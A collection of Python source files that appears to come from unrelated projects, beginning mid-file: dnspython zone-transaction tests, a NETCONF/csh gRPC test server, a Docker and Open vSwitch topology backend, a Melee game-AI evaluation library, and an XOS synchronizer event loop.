txn.delete(a99)
assert not txn.name_exists(a99)
assert txn.name_exists(a100)
def test_write_after_rollback(zone):
with pytest.raises(ExpectedException):
with zone.writer() as txn:
a99 = dns.name.from_text('a99', None)
rds = dns.rdataset.from_text('in', 'a', 300, '10.0.0.99')
txn.add(a99, rds)
raise ExpectedException
with zone.writer() as txn:
a99 = dns.name.from_text('a99', None)
rds = dns.rdataset.from_text('in', 'a', 300, '10.99.99.99')
txn.add(a99, rds)
assert zone.get_rdataset('a99', 'a') == rds
def test_zone_get_deleted(zone):
with zone.writer() as txn:
ns1 = dns.name.from_text('ns1', None)
assert txn.get(ns1, dns.rdatatype.A) is not None
txn.delete(ns1)
assert txn.get(ns1, dns.rdatatype.A) is None
ns2 = dns.name.from_text('ns2', None)
txn.delete(ns2, dns.rdatatype.A)
assert txn.get(ns2, dns.rdatatype.A) is None
def test_zone_bad_class(zone):
with zone.writer() as txn:
rds = dns.rdataset.from_text('ch', 'ns', 300, 'ns1', 'ns2')
with pytest.raises(ValueError):
txn.add(dns.name.empty, rds)
with pytest.raises(ValueError):
txn.replace(dns.name.empty, rds)
with pytest.raises(ValueError):
txn.delete(dns.name.empty, rds)
def test_update_serial(zone):
# basic
with zone.writer() as txn:
txn.update_serial()
rdataset = zone.find_rdataset('@', 'soa')
assert rdataset[0].serial == 2
# max
with zone.writer() as txn:
txn.update_serial(0xffffffff, False)
rdataset = zone.find_rdataset('@', 'soa')
assert rdataset[0].serial == 0xffffffff
# wraparound to 1
with zone.writer() as txn:
txn.update_serial()
rdataset = zone.find_rdataset('@', 'soa')
assert rdataset[0].serial == 1
# trying to set to zero sets to 1
with zone.writer() as txn:
txn.update_serial(0, False)
rdataset = zone.find_rdataset('@', 'soa')
assert rdataset[0].serial == 1
with pytest.raises(KeyError):
with zone.writer() as txn:
txn.update_serial(name=dns.name.from_text('unknown', None))
with pytest.raises(ValueError):
with zone.writer() as txn:
txn.update_serial(-1)
with pytest.raises(ValueError):
with zone.writer() as txn:
txn.update_serial(2**31)
class ExpectedException(Exception):
pass
def test_zone_rollback(zone):
a99 = dns.name.from_text('a99.example.')
try:
with zone.writer() as txn:
rds = dns.rdataset.from_text('in', 'a', 300, '10.0.0.99')
txn.add(a99, rds)
assert txn.name_exists(a99)
raise ExpectedException
except ExpectedException:
pass
assert not zone.get_node(a99)
def test_zone_ooz_name(zone):
with zone.writer() as txn:
with pytest.raises(KeyError):
a99 = dns.name.from_text('a99.not-example.')
assert txn.name_exists(a99)
def test_zone_iteration(zone):
expected = {}
for (name, rdataset) in zone.iterate_rdatasets():
expected[(name, rdataset.rdtype, rdataset.covers)] = rdataset
with zone.writer() as txn:
actual = {}
for (name, rdataset) in txn:
actual[(name, rdataset.rdtype, rdataset.covers)] = rdataset
assert actual == expected
@pytest.fixture
def vzone():
return dns.zone.from_text(example_text, zone_factory=dns.versioned.Zone)
def test_vzone_read_only(vzone):
with vzone.reader() as txn:
rdataset = txn.get(dns.name.empty, dns.rdatatype.NS, dns.rdatatype.NONE)
expected = dns.rdataset.from_text('in', 'ns', 300, 'ns1', 'ns2')
assert rdataset == expected
with pytest.raises(dns.transaction.ReadOnly):
txn.replace(dns.name.empty, expected)
def test_vzone_multiple_versions(vzone):
assert len(vzone._versions) == 1
vzone.set_max_versions(None) # unlimited!
with vzone.writer() as txn:
txn.update_serial()
with vzone.writer() as txn:
txn.update_serial()
with vzone.writer() as txn:
txn.update_serial(1000, False)
rdataset = vzone.find_rdataset('@', 'soa')
assert rdataset[0].serial == 1000
assert len(vzone._versions) == 4
with vzone.reader(id=5) as txn:
assert txn.version.id == 5
rdataset = txn.get('@', 'soa')
assert rdataset[0].serial == 1000
with vzone.reader(serial=1000) as txn:
assert txn.version.id == 5
rdataset = txn.get('@', 'soa')
assert rdataset[0].serial == 1000
vzone.set_max_versions(2)
assert len(vzone._versions) == 2
# The ones that survived should be 3 and 1000
rdataset = vzone._versions[0].get_rdataset(dns.name.empty,
dns.rdatatype.SOA,
dns.rdatatype.NONE)
assert rdataset[0].serial == 3
rdataset = vzone._versions[1].get_rdataset(dns.name.empty,
dns.rdatatype.SOA,
dns.rdatatype.NONE)
assert rdataset[0].serial == 1000
with pytest.raises(ValueError):
vzone.set_max_versions(0)
# for debugging if needed
def _dump(zone):
for v in zone._versions:
print('VERSION', v.id)
for (name, n) in v.nodes.items():
for rdataset in n:
print(rdataset.to_text(name))
def test_vzone_open_txn_pins_versions(vzone):
assert len(vzone._versions) == 1
vzone.set_max_versions(None) # unlimited!
with vzone.writer() as txn:
txn.update_serial()
with vzone.writer() as txn:
txn.update_serial()
with vzone.writer() as txn:
txn.update_serial()
with vzone.reader(id=2) as txn:
vzone.set_max_versions(1)
with vzone.reader(id=3) as txn:
rdataset = txn.get('@', 'soa')
assert rdataset[0].serial == 2
assert len(vzone._versions) == 4
assert len(vzone._versions) == 1
rdataset = vzone.find_rdataset('@', 'soa')
assert vzone._versions[0].id == 5
assert rdataset[0].serial == 4
try:
import threading
one_got_lock = threading.Event()
def run_one(zone):
with zone.writer() as txn:
one_got_lock.set()
# wait until two blocks
while len(zone._write_waiters) == 0:
time.sleep(0.01)
rds = dns.rdataset.from_text('in', 'a', 300, '10.0.0.98')
txn.add('a98', rds)
def run_two(zone):
# wait until one has the lock so we know we will block if we
# get the call done before the sleep in one completes
one_got_lock.wait()
with zone.writer() as txn:
rds = dns.rdataset.from_text('in', 'a', 300, '10.0.0.99')
txn.add('a99', rds)
def test_vzone_concurrency(vzone):
t1 = threading.Thread(target=run_one, args=(vzone,))
t1.start()
t2 = threading.Thread(target=run_two, args=(vzone,))
t2.start()
t1.join()
t2.join()
with vzone.reader() as txn:
assert txn.name_exists('a98')
assert txn.name_exists('a99')
except ImportError: # pragma: no cover
pass
|
nc_grpc_server.py
|
"""This is test gRPC server implemented to test the gRPC client"""
from __future__ import print_function
from concurrent import futures
import time
import math
import logging
import sys
import os,socket,json
import argparse
import signal
import grpc
import subprocess
import select
import threading
import jnx_netconf_service_pb2 as nc_grpc_pb2
import jnx_netconf_service_pb2_grpc as nc_grpc_pb2_grpc
# global space
client_list = {}
client_list_detail = {}
connections = {}
server = None
keys_location = os.path.dirname(os.path.realpath(sys.argv[0]))
#Create and configure logger
logFormatter = logging.Formatter("%(asctime)s [%(levelname)-5.5s] %(message)s")
logger = logging.getLogger('nc_grpc_server')
fileHandler = logging.FileHandler(keys_location + '/nc_grpc_server.log')
fileHandler.setFormatter(logFormatter)
logger.addHandler(fileHandler)
consoleHandler = logging.StreamHandler(sys.stdout)
consoleHandler.setFormatter(logFormatter)
logger.addHandler(consoleHandler)
logger.setLevel(logging.DEBUG)
def daemonize():
"""Deamonize class. UNIX double fork mechanism."""
global keys_location
logger.info(keys_location)
try:
pid = os.fork()
if pid > 0:
# exit first parent
sys.exit(0)
except OSError as err:
sys.stderr.write('fork #1 failed: {0}\n'.format(err))
sys.exit(1)
logger.info("First parent process is exited")
# decouple from parent environment
os.chdir('/')
os.setsid()
os.umask(0)
# do second fork
try:
pid = os.fork()
if pid > 0:
# exit from second parent
sys.exit(0)
except OSError as err:
sys.stderr.write('fork #2 failed: {0}\n'.format(err))
sys.exit(1)
logger.info("Second parent process is exited")
# redirect standard file descriptors
sys.stdout.flush()
sys.stderr.flush()
si = open(os.devnull, 'r')
so = open(os.devnull, 'a+')
se = open(os.devnull, 'a+')
os.dup2(si.fileno(), sys.stdin.fileno())
os.dup2(so.fileno(), sys.stdout.fileno())
os.dup2(se.fileno(), sys.stderr.fileno())
logger.info("File descriptors redirection completed")
def close_socket(listen_s):
try:
listen_s.shutdown()
except:
pass
try:
listen_s.close()
except:
pass
class UserInputTimeoutError(Exception):
pass
def print_data(request_iterator, c):
try:
logger.info("print_data: Inside print data thread")
prev_message = []
logger.info("print_data: Entered the simultaneous thread print data")
for request_point in request_iterator:
logger.info("print_data: Inside request iterator")
logger.info(str(request_point.message).rstrip())
try:
c.send((str(request_point.message).rstrip()).encode())
except:
pass
prev_message.append(str(request_point.message).rstrip())
if (str(request_point.message).rstrip()).startswith('client is stopping,'):
logger.info("*****print statement breaking******")
return
except:
c.send(("client is stopping,").encode())
logger.info("*********************client connection lost*********************")
return
class Ncgrpc(nc_grpc_pb2_grpc.NcgrpcServicer):
"""Provides methods that implement functionality of NetconfRpc server."""
def __init__(self):
logger.info("***************************Constructor called, Ncgrpc class constructed*************************************")
def __del__(self):
logger.info("Destructor called, Ncgrpc deleted.")
def NcgrpcServerStatusGet(self, request, context):
logger.info("is server running rpc called")
return nc_grpc_pb2.NcgrpcServerStatusGetResponse(
status = 1
)
def NcgrpcCommandGet(self, request_iterator, context):
global connections
meta_dict = {}
for key, value in context.invocation_metadata():
logger.info('Received initial metadata: key={} value={}'.format(key, value))
meta_dict.update({key:value})
conn = connections[context.peer()]
session_type_self = meta_dict["conn_type"]
t1 = threading.Thread(target=print_data, args=(request_iterator,conn,))
t1.start()
while True:
data_r = conn.recv(1024)
logger.info(data_r)
logger.info("Data received from request session ")
if session_type_self == "netconf":
if not (t1.isAlive()):
logger.info("NcgrpcCommandGet: Other thread is closed")
break
if data_r.decode().strip() == "":
logger.info("NcgrpcCommandGet: Request session script closed")
yield nc_grpc_pb2.NcgrpcCommandGetResponse(
netconf_command = "<>",
kill_signal = 2)
t1.join()
break
logger.info(data_r.decode())
cmd_new = str(data_r.decode().strip())
yield nc_grpc_pb2.NcgrpcCommandGetResponse(
netconf_command = cmd_new,
kill_signal = 0)
# if cmd_new == "<>":
# t1.join()
# break
elif session_type_self == "csh":
if not (t1.isAlive()):
logger.info("NcgrpcCommandGet: Other thread is closed")
break
if data_r.decode().strip() == "":
logger.info("NcgrpcCommandGet: Request session script closed")
yield nc_grpc_pb2.NcgrpcCommandGetResponse(
csh_command = "exit",
kill_signal = 2)
t1.join()
break
logger.info(data_r.decode())
cmd_new = str(data_r.decode().strip())
yield nc_grpc_pb2.NcgrpcCommandGetResponse(
csh_command = cmd_new,
kill_signal = 0)
# The below code is commented unlike in netconf case, as one
# should not close the session based on exit statement during csh mode
# if cmd_new == "exit":
# t1.join()
# break
connections.pop(context.peer())
logger.info("****************** Good Bye*****RPC Ended ********************")
def NcgrpcInitialize(self, request, context):
global client_list
global connections
global client_list_detail
global keys_location
message_auth = request.device_id
grpc_app_id = request.instance_id
secret_key = request.secret_key
logger.info(type(message_auth))
logger.info(message_auth)
client_name = message_auth
for key, value in context.invocation_metadata():
logger.info("NcgrpcInitialize: Received initial metadata(Initial handshake): key={} value={}".format(key, value))
if client_name not in client_list_detail.keys() or (client_name in client_list_detail.keys() and grpc_app_id != client_list_detail[client_name][3]):
logger.info("NcgrpcInitialize: Client is restarted or a new client is trying to connect")
listen_s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listen_s.bind(('localhost', 0))
listen_s.listen()
port = listen_s.getsockname()[1]
port_str = str(port)
data = {client_name: [port_str, listen_s, 1, grpc_app_id]}
if client_name in client_list_detail.keys():
close_socket(client_list_detail[client_name][1])
client_list_detail.update(data)
data = {client_name: port_str}
client_list.update(data)
with open(keys_location + '/server_data.json', 'w+') as outfile:
json.dump(client_list, outfile)
else:
listen_s = client_list_detail[client_name][1]
port = int(client_list_detail[client_name][0])
port_str = str(port)
client_list_detail[client_name][2] = client_list_detail[client_name][2] +1
logger.info("NcgrpcInitialize: else statement executed properly")
logger.info("Listenning")
while True:
c, addr = listen_s.accept()
logger.info("Connection received")
first_message = c.recv(1024)
logger.info("Initial hand shake completed and the client is trusted")
rep_mes = str(first_message.decode().strip())
logger.info(rep_mes)
index = rep_mes.find(':')
secret_key_from_script = rep_mes[index+1:]
rep_mes = rep_mes[0:index]
if secret_key == secret_key_from_script:
c.send(("correct secret key").encode())
break
else:
c.send(("wrong secret key").encode())
context.set_trailing_metadata((
('port', port_str),
('conn_type', rep_mes),
))
logger.info(connections)
connections.update({context.peer():c})
logger.info(connections)
logger.info("Going to return value from initial handshake")
try:
if rep_mes == "netconf":
return nc_grpc_pb2.NcgrpcInitializeResponse(
session_type = 0
)
elif rep_mes == "csh":
return nc_grpc_pb2.NcgrpcInitializeResponse(
session_type = 1
)
except:
try:
listen_s.shutdown()
except:
pass
try:
listen_s.close()
except:
pass
def serve():
logger.info("Serve function is called")
global port
global server
global keys_location
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
nc_grpc_pb2_grpc.add_NcgrpcServicer_to_server(
Ncgrpc(), server)
logger.info("Server object is created")
with open(keys_location + '/server.key', 'rb') as f:
private_key = f.read()
with open(keys_location + '/server.crt', 'rb') as f:
certificate_chain = f.read()
logger.info("Read the certificates")
server_credentials = grpc.ssl_server_credentials(((private_key, certificate_chain,),))
server.add_secure_port('[::]:' + port, server_credentials)
server.start()
logger.info("Server started")
server.wait_for_termination()
def signal_handler(sig, frame):
global server
global keys_location
logger.info("Entered into signal_handler")
if server != None:
server.stop(1)
logger.info("Stopping the grpc server gracefully")
pid = os.getpid()
try:
os.remove(keys_location + "/server_data.json")
except:
pass
os.kill(pid, signal.SIGKILL)
if __name__ == '__main__':
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGQUIT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
parser = argparse.ArgumentParser()
parser.add_argument('-p', '--port', help='client port',
required=True)
args = parser.parse_args()
port = args.port
daemonize()
serve()
|
DNbackend.py
|
__author__ = 'alejandroaguado'
import redis, logging, sys, json, time
import netifaces as ni
from subprocess import check_output
from docker import Client
import traceback
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler(sys.stdout)
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
logger.addHandler(ch)
stts={"stats":{}}
docky=Client(base_url='unix://var/run/docker.sock')
def load_state():
r=redis.StrictRedis(host="0.0.0.0",port=6379,db=0)
n=r.get("dockernet")
nets={}
if None!=n:
nets=json.loads(n)
return nets
def save_state(n):
r=redis.StrictRedis(host="0.0.0.0",port=6379,db=0)
logger.info("Saving status")
r.set("dockernet",json.dumps(n))
logger.info("Saved")
def RepresentsInt(s):
try:
int(s)
return True
except ValueError:
return False
def add_node(t,n):
try:
if n['type']=="OVS":
check_output(["sudo","ovs-vsctl","add-br",n['id']])
if "controller" in t.keys():
logger.info("Adding controller "+t['controller']['ip']+" to "+n['id'])
time.sleep(0.5)
check_output(["sudo","ovs-vsctl","set-controller",n['id'],"tcp:"+t['controller']['ip']+":6633"])
fakedpid=check_output(["sudo", "ovs-vsctl", "get", "bridge", n['id'], "datapath-id"]).replace('"',"")
j=0
dpid=""
while j<len(fakedpid)-1:
dpid+=fakedpid[j:j+2]+":"
j+=2
dpid=dpid[:-1]
n['dpid']=dpid
if "stp" in n.keys() and n['stp']:
check_output(["sudo","ovs-vsctl","set","bridge",n['id'],"stp_enable=true"])
elif n['type']=="LC":
hc=docky.create_host_config(privileged=True)
docky.create_container(image=n['image'], stdin_open=True, tty=True,command="/bin/bash", name=n['id'], detach=True, host_config=hc)
docky.start(n['id'])
except:
logger.warn("Error adding node: "+n['id'])
#TODO: add first the node information in the node if required (editing)!!!!!!!!!
def add_edge(t,e):
try:
if t['nodes'][e['src']['id']]['type']=="LC" and t['nodes'][e['dst']['id']]['type']=="LC":
logger.warn("LC to LC edge not supported :(")
elif t['nodes'][e['src']['id']]['type']=="LC":
ibef=check_output(["sudo","ovs-vsctl","list-ifaces",e['dst']['id']]).split("\n")
check_output(['sudo', 'ovs-docker', 'add-port', ''+e['dst']['id']+'', e['src']['intf'], ''+e['src']['id']+'', '--ipaddress='+t['nodes'][e['src']['id']]['intf'][e['src']['intf']]['ip']+'/24'])
iaft=check_output(["sudo","ovs-vsctl","list-ifaces",e['dst']['id']]).split("\n")
pname=list(set(iaft) - set(ibef))[0]
port=str(json.loads(check_output(["sudo","ovs-vsctl","--columns=ofport","--format=json","list","interface", pname]))["data"][0][0])
t['nodes'][e['src']['id']]['intf'][e['src']['intf']]['attpoint']=t['nodes'][e['dst']['id']]['dpid']+"|"+port
mac=""
try:
mac=check_output(["./get_intf_mac.sh",e['src']['id'],e['src']['intf']])[:-1]
except:
print "mac not found..."
t['nodes'][e['src']['id']]['intf'][e['src']['intf']]["mac"]=mac
info=docky.exec_create(e['src']['id'],"ping "+t['nodes'][e['src']['id']]['intf'][e['src']['intf']]['gw']+" -c 5")
exid=info['Id']
docky.exec_start(exid,detach=True)
#print ["sudo", "ovs-vsctl","set", "port", pname, "tag="+e['src']['vlan']]
if "vlan" in e['src'].keys():
check_output(["sudo", "ovs-vsctl","set", "port", pname, "tag="+e['src']['vlan']])
elif t['nodes'][e['dst']['id']]['type']=="LC":
ibef=check_output(["sudo","ovs-vsctl","list-ifaces",e['src']['id']]).split("\n")
check_output(['sudo', 'ovs-docker', 'add-port', ''+e['src']['id']+'', e['dst']['intf'], ''+e['dst']['id']+'', '--ipaddress='+t['nodes'][e['dst']['id']]['intf'][e['dst']['intf']]['ip']+'/24'])
iaft=check_output(["sudo","ovs-vsctl","list-ifaces",e['src']['id']]).split("\n")
pname=list(set(iaft) - set(ibef))[0]
port=str(json.loads(check_output(["sudo","ovs-vsctl","--columns=ofport","--format=json","list","interface", pname]))["data"][0][0])
t['nodes'][e['dst']['id']]['intf'][e['dst']['intf']]['attpoint']=t['nodes'][e['src']['id']]['dpid']+"|"+port
mac=""
try:
mac=check_output(["./get_intf_mac.sh",e['dst']['id'],e['dst']['intf']])[:-1]
except:
print "mac not found..."
t['nodes'][e['dst']['id']]['intf'][e['dst']['intf']]["mac"]=mac
info=docky.exec_create(e['dst']['id'],"ping "+t['nodes'][e['dst']['id']]['intf'][e['dst']['intf']]['gw']+" -c 5")
exid=info['Id']
docky.exec_start(exid,detach=True)
#print ["sudo", "ovs-vsctl","set", "port", pname, "tag="+e['dst']['vlan']]
if "vlan" in e['dst'].keys():
check_output(["sudo", "ovs-vsctl","set", "port", pname, "tag="+e['dst']['vlan']])
elif t['nodes'][e['src']['id']]['type']=="OVS" and t['nodes'][e['dst']['id']]['type']=="OVS":
check_output(["sudo", "ovs-vsctl", "add-port", e['src']['id'], "from_"+e['src']['id']+"_to_"+e['dst']['id']])
check_output(["sudo", "ovs-vsctl", "add-port", e['dst']['id'], "from_"+e['dst']['id']+"_to_"+e['src']['id']])
check_output(["sudo","ovs-vsctl", "set", "interface", "from_"+e['src']['id']+"_to_"+e['dst']['id'], "type=patch", "options:peer="+"from_"+e['dst']['id']+"_to_"+e['src']['id']])
check_output(["sudo","ovs-vsctl", "set", "interface", "from_"+e['dst']['id']+"_to_"+e['src']['id'], "type=patch", "options:peer="+"from_"+e['src']['id']+"_to_"+e['dst']['id']])
else:
logger.warn("Link error: Technologies not found")
except:
logger.warn("Error adding edge: "+json.dumps(e))
logger.warn(traceback.format_exc())
def del_edge(t,e):
try:
if t['nodes'][e['src']['id']]['type']=="LC" and t['nodes'][e['dst']['id']]['type']=="LC":
logger.warn("LC to LC edge not supported :(")
elif t['nodes'][e['src']['id']]['type']=="LC":
check_output(['sudo', 'ovs-docker', 'del-port', ''+e['dst']['id']+'', e['src']['intf'], ''+e['src']['id']+'', '--ipaddress='+t['nodes'][e['src']['id']]['intf'][e['src']['intf']]['ip']+'/24'])
elif t['nodes'][e['dst']['id']]['type']=="LC":
check_output(['sudo', 'ovs-docker', 'del-port', ''+e['src']['id']+'', e['dst']['intf'], ''+e['dst']['id']+'', '--ipaddress='+t['nodes'][e['dst']['id']]['intf'][e['dst']['intf']]['ip']+'/24'])
elif t['nodes'][e['src']['id']]['type']=="OVS" and t['nodes'][e['dst']['id']]['type']=="OVS":
check_output(["sudo", "ovs-vsctl", "del-port", e['src']['id'], "from_"+e['src']['id']+"_to_"+e['dst']['id']])
check_output(["sudo", "ovs-vsctl", "del-port", e['dst']['id'], "from_"+e['dst']['id']+"_to_"+e['src']['id']])
else:
logger.warn("Link error: Technologies not found")
except:
logger.warn("Error adding edge: "+json.dumps(e))
def del_node(t,n):
try:
if n['type']=="OVS":
tobedel=[]
for e in t['edges']:
if n['id'] in [e['src']['id'],e['dst']['id']]:
print "DELETING EDGE!!!"+json.dumps(e)
del_edge(t,e)
tobedel.append(e)
for e in tobedel:
if t['nodes'][e['src']['id']]['type']=="LC":
del t['nodes'][e['src']['id']]['intf'][e['src']['intf']]
if t['nodes'][e['dst']['id']]['type']=="LC":
del t['nodes'][e['dst']['id']]['intf'][e['dst']['intf']]
t['edges'].remove(e)
check_output(["sudo","ovs-vsctl","del-br",n['id']])
elif n['type']=="LC":
tobedel=[]
for e in t['edges']:
if n['id'] in [e['src']['id'],e['dst']['id']]:
del_edge(t,e)
tobedel.append(e)
for e in tobedel:
if t['nodes'][e['src']['id']]['type']=="LC":
del t['nodes'][e['src']['id']]['intf'][e['src']['intf']]
if t['nodes'][e['dst']['id']]['type']=="LC":
del t['nodes'][e['dst']['id']]['intf'][e['dst']['intf']]
t['edges'].remove(e)
docky.stop(n['id'])
docky.remove_container(n['id'])
except:
print n
logger.warn("Error deleting node: "+n['id'])
def add_controller(t,ip, switch):
check_output(["sudo","ovs-vsctl","set-controller",switch,"tcp:"+ip+":6633"])
'''
for n in t['nodes'].keys():
if t['nodes'][n]['type']=="OVS":
try:
check_output(["sudo","ovs-vsctl","set-controller",n,"tcp:"+ip+":6633"])
except:
logger.warn("Error adding controller to "+n)
'''
t['nodes'][switch]['controller']=ip
#t['controller']={"ip":ip}
def create_topology_from_data(t):
#It's assumed that at this point the topology has been checked through "validate_input_data(t)"
for k in t['nodes'].keys():
add_node(t,t['nodes'][k])
for e in t['edges']:
add_edge(t,e)
for k in t['nodes'].keys():
if "controller" in t['nodes'][k].keys():
add_controller(t,t['nodes'][k]['controller'], k)
i=0
if "attachPoints" in t.keys():
for ap in t['attachPoints']:
try:
check_output(["sudo","ovs-vsctl","add-port",ap['switch'],ap['interface']])
i+=1
except:
logger.warn("Error adding attachment point: "+json.dumps(ap))
del t['attachPoints'][i]
if "vxlantunnel" in t.keys():
for ap in t['vxlantunnel']:
try:
vni=""
if "vni" in ap.keys(): vni=ap["vni"]
else: vni="flow"
check_output(["sudo","ovs-vsctl","add-port",ap['switch'],ap['port'],"--","set","interface",ap['port'],"type=vxlan","options:remote_ip="+ap['remote'],"options:key="+vni])
i+=1
except:
logger.warn("Error adding tunnel point: "+json.dumps(ap))
del t['vxlantunnel'][i]
if "gretunnel" in t.keys():
for ap in t['gretunnel']:
try:
check_output(["sudo","ovs-vsctl","add-port",ap['switch'],ap['port'],"--","set","interface",ap['port'],"type=gre","options:remote_ip="+ap['remote']])
i+=1
except:
logger.warn("Error adding tunnel point: "+json.dumps(ap))
del t['gretunnel'][i]
def get_stats():
stop=True;
while (stop):
try:
stts['stats'] = json.loads(check_output(["./get_stats.sh"]))
except ValueError:
print "ERROR GATHERING STATS"
time.sleep(5)
import threading
processThread = threading.Thread(target=get_stats, args=()) # <- note extra ','
processThread.start()
dnet=load_state()
if dnet=={}:
dnet={"nodes":{}, "edges":[]}
|
eval_lib.py
|
import functools
import multiprocessing as mp
from typing import Callable, Mapping, NamedTuple, Tuple
import numpy as np
import tensorflow as tf
import melee
from slippi_ai import embed, policies, data, saving, dolphin
expected_players = (1, 2)
class Policy(NamedTuple):
sample: Callable[
[data.CompressedGame, policies.RecurrentState],
Tuple[policies.ControllerWithRepeat, policies.RecurrentState]]
initial_state: Callable[[int], policies.RecurrentState]
@staticmethod
def from_saved_model(path: str) -> "Policy":
policy = tf.saved_model.load(path)
return Policy(
sample=lambda *structs: policy.sample(*tf.nest.flatten(structs)),
initial_state=policy.initial_state)
@staticmethod
def from_experiment(tag: str, sample_kwargs=None) -> "Policy":
policy = saving.load_policy(tag)
sample_kwargs = sample_kwargs or {}
sample = functools.partial(policy.sample, **sample_kwargs)
return Policy(
sample=tf.function(sample),
# sample=sample,
initial_state=policy.initial_state)
def send_controller(controller: melee.Controller, controller_state: dict):
for b in embed.LEGAL_BUTTONS:
if controller_state['button'][b.value]:
controller.press_button(b)
else:
controller.release_button(b)
main_stick = controller_state["main_stick"]
controller.tilt_analog(melee.Button.BUTTON_MAIN, *main_stick)
c_stick = controller_state["c_stick"]
controller.tilt_analog(melee.Button.BUTTON_C, *c_stick)
controller.press_shoulder(melee.Button.BUTTON_L, controller_state["l_shoulder"])
controller.press_shoulder(melee.Button.BUTTON_R, controller_state["r_shoulder"])
class Agent:
def __init__(
self,
controller: melee.Controller,
opponent_port: int,
policy: Policy,
):
self._controller = controller
self._port = controller.port
self._players = (self._port, opponent_port)
self._embed_game = embed.make_game_embedding(ports=self._players)
self._policy = policy
self._sample = policy.sample
self._hidden_state = policy.initial_state(1)
self._current_action_repeat = 0
self._current_repeats_left = 0
def step(self, gamestate: melee.GameState):
if self._current_repeats_left > 0:
self._current_repeats_left -= 1
return None
embedded_game = self._embed_game.from_state(gamestate)
# put the players in the expected positions
# embedded_game['player'] = {
# e: embedded_game['player'][p]
# for e, p in zip(expected_players, self._players)}
unbatched_input = data.CompressedGame(embedded_game, self._current_action_repeat, 0.)
batched_input = tf.nest.map_structure(
lambda a: np.expand_dims(a, 0), unbatched_input)
sampled_controller_with_repeat, self._hidden_state = self._sample(
batched_input, self._hidden_state)
sampled_controller_with_repeat = tf.nest.map_structure(
lambda t: np.squeeze(t.numpy(), 0), sampled_controller_with_repeat)
sampled_controller = sampled_controller_with_repeat['controller']
self._current_action_repeat = sampled_controller_with_repeat['action_repeat']
self._current_repeats_left = self._current_action_repeat
send_controller(self._controller, sampled_controller)
return sampled_controller_with_repeat
class Environment(dolphin.Dolphin):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
assert len(self._players) == 2
self._game_embedders = {}
ports = list(self._players)
for port, opponent_port in zip(ports, reversed(ports)):
if isinstance(self._players[port], dolphin.AI):
self._game_embedders[port] = embed.make_game_embedding(
ports=(port, opponent_port))
def step(self, controllers: Mapping[int, dict]):
for port, controller in controllers.items():
send_controller(self.controllers[port], controller)
gamestate = super().step()
return {port: e.from_state(gamestate) for port, e in self._game_embedders.items()}
def run_env(init_kwargs, conn):
env = Environment(**init_kwargs)
while True:
controllers = conn.recv()
if controllers is None:
break
conn.send(env.step(controllers))
env.stop()
conn.close()
class AsyncEnv:
def __init__(self, **kwargs):
self._parent_conn, child_conn = mp.Pipe()
self._process = mp.Process(target=run_env, args=(kwargs, child_conn))
self._process.start()
def stop(self):
self._parent_conn.send(None)
self._process.join()
self._parent_conn.close()
def send(self, controllers):
self._parent_conn.send(controllers)
def recv(self):
return self._parent_conn.recv()
|
event_loop.py
|
import os
import imp
import inspect
import time
import traceback
import commands
import threading
import json
import pdb
from datetime import datetime
from collections import defaultdict
from core.models import *
from django.db.models import F, Q
#from openstack.manager import OpenStackManager
from openstack.driver import OpenStackDriver
from xos.logger import Logger, logging, logger
#from timeout import timeout
from xos.config import Config, XOS_DIR
from synchronizers.base.steps import *
from syncstep import SyncStep
from toposort import toposort
from synchronizers.base.error_mapper import *
debug_mode = False
logger = Logger(level=logging.INFO)
class StepNotReady(Exception):
pass
class NoOpDriver:
def __init__(self):
self.enabled = True
self.dependency_graph = None
STEP_STATUS_WORKING=1
STEP_STATUS_OK=2
STEP_STATUS_KO=3
def invert_graph(g):
ig = {}
for k,v in g.items():
for v0 in v:
try:
ig[v0].append(k)
except:
ig=[k]
return ig
class XOSObserver:
#sync_steps = [SyncNetworks,SyncNetworkInstances,SyncSites,SyncSitePrivilege,SyncSlices,SyncSliceMemberships,SyncInstances,SyncInstanceIps,SyncExternalRoutes,SyncUsers,SyncRoles,SyncNodes,SyncImages,GarbageCollector]
sync_steps = []
def __init__(self):
# The Condition object that gets signalled by Feefie events
self.step_lookup = {}
self.load_sync_step_modules()
self.load_sync_steps()
self.event_cond = threading.Condition()
self.driver_kind = getattr(Config(), "observer_driver", "openstack")
if self.driver_kind=="openstack":
self.driver = OpenStackDriver()
else:
self.driver = NoOpDriver()
def wait_for_event(self, timeout):
self.event_cond.acquire()
self.event_cond.wait(timeout)
self.event_cond.release()
def wake_up(self):
logger.info('Wake up routine called. Event cond %r'%self.event_cond)
self.event_cond.acquire()
self.event_cond.notify()
self.event_cond.release()
def load_sync_step_modules(self, step_dir=None):
if step_dir is None:
if hasattr(Config(), "observer_steps_dir"):
step_dir = Config().observer_steps_dir
else:
step_dir = XOS_DIR + "/observer/steps"
for fn in os.listdir(step_dir):
pathname = os.path.join(step_dir,fn)
if os.path.isfile(pathname) and fn.endswith(".py") and (fn!="__init__.py"):
module = imp.load_source(fn[:-3],pathname)
for classname in dir(module):
c = getattr(module, classname, None)
# make sure 'c' is a descendent of SyncStep and has a
# provides field (this eliminates the abstract base classes
# since they don't have a provides)
if inspect.isclass(c) and issubclass(c, SyncStep) and hasattr(c,"provides") and (c not in self.sync_steps):
self.sync_steps.append(c)
logger.info('loaded sync steps: %s' % ",".join([x.__name__ for x in self.sync_steps]))
# print 'loaded sync steps: %s' % ",".join([x.__name__ for x in self.sync_steps])
def load_sync_steps(self):
dep_path = Config().observer_dependency_graph
logger.info('Loading model dependency graph from %s' % dep_path)
try:
# This contains dependencies between records, not sync steps
self.model_dependency_graph = json.loads(open(dep_path).read())
except Exception,e:
raise e
try:
backend_path = Config().observer_pl_dependency_graph
logger.info('Loading backend dependency graph from %s' % backend_path)
# This contains dependencies between backend records
self.backend_dependency_graph = json.loads(open(backend_path).read())
except Exception,e:
logger.info('Backend dependency graph not loaded')
# We can work without a backend graph
self.backend_dependency_graph = {}
provides_dict = {}
for s in self.sync_steps:
self.step_lookup[s.__name__] = s
for m in s.provides:
try:
provides_dict[m.__name__].append(s.__name__)
except KeyError:
provides_dict[m.__name__]=[s.__name__]
step_graph = {}
